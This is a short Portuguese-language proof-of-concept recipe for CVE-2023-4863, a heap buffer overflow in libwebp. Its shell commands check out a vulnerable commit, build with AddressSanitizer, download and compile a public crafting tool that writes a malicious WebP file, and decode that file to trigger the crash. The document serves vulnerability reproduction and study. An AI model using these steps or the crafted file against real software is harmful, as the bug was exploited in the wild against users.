
Prova de conceito de exploit para CVE-2023-4863, um estouro de buffer no heap em libwebp, demonstrando o gatilho de crash e etapas de reprodução com AddressSanitizer.
# verificar o webp
git clone https://chromium.googlesource.com/webm/libwebp/ webp_test
cd webp_test/
# verificar versão vulnerável
git checkout 7ba44f80f3b94fc0138db159afea770ef06532a0
# habilitar AddressSanitizer
sed -i 's/^EXTRA_FLAGS=.*/& -fsanitize=address/' makefile.unix
# compilar webp
make -f makefile.unix
cd examples/
# buscar o código de prova de conceito do mistymntncop
wget https://raw.githubusercontent.com/mistymntncop/CVE-2023-4863/main/craft.c
# compilar e executar prova de conceito
gcc -o craft craft.c
./craft bad.webp
# testar arquivo de gatilho
./dwebp bad.webp -o test.png